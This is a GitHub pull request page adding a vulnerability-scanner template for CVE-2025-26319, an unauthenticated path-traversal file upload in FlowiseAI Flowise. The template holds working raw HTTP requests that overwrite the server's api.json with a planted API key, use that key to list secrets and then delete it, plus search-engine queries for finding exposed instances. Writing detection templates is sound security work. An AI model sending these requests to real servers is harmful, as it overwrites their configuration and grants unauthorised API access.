Skip to content

Create CVE-2025-26319.yaml #11720

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 1 commit into from
Mar 12, 2025
Merged

Create CVE-2025-26319.yaml #11720

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
81 changes: 81 additions & 0 deletions http/cves/2025/CVE-2025-26319.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,81 @@
id: CVE-2025-26319

info:
name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
reference:
- https://github.com/advisories/GHSA-69jq-qr7w-j7qh
- https://github.com/FlowiseAI/Flowise
- https://nvd.nist.gov/vuln/detail/CVE-2025-26319
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-26319
cwe-id: CWE-434
metadata:
verified: true
max-request: 3
vendor: FlowiseAI
product: Flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
tags: cve,cve2025,flowise,fileupload,intrusive

flow: http(1) && http(2)

http:
- raw:
- |
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

------WebKitFormBoundarydTh0yj8zypRgPT1w
Content-Disposition: form-data; name="files";filename="api.json"
Content-type: text/plain

[{
"keyName":"=",
"apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
"apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
"createdAt":"111",
"id":"1111"
}]
------WebKitFormBoundarydTh0yj8zypRgPT1w--

matchers:
- type: word
part: body
words:
- 'name":'
- 'mimeType":"text/plain'
condition: and
internal: true

- raw:
- |
GET /api/v1/apikey HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

- |
DELETE /api/v1/apikey/1111 HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

matchers-condition: and
matchers:
- type: word
part: body
words:
- 'apiKey":"'
- 'apiSecret":'
- 'chatFlows'
condition: and

- type: status
status:
- 200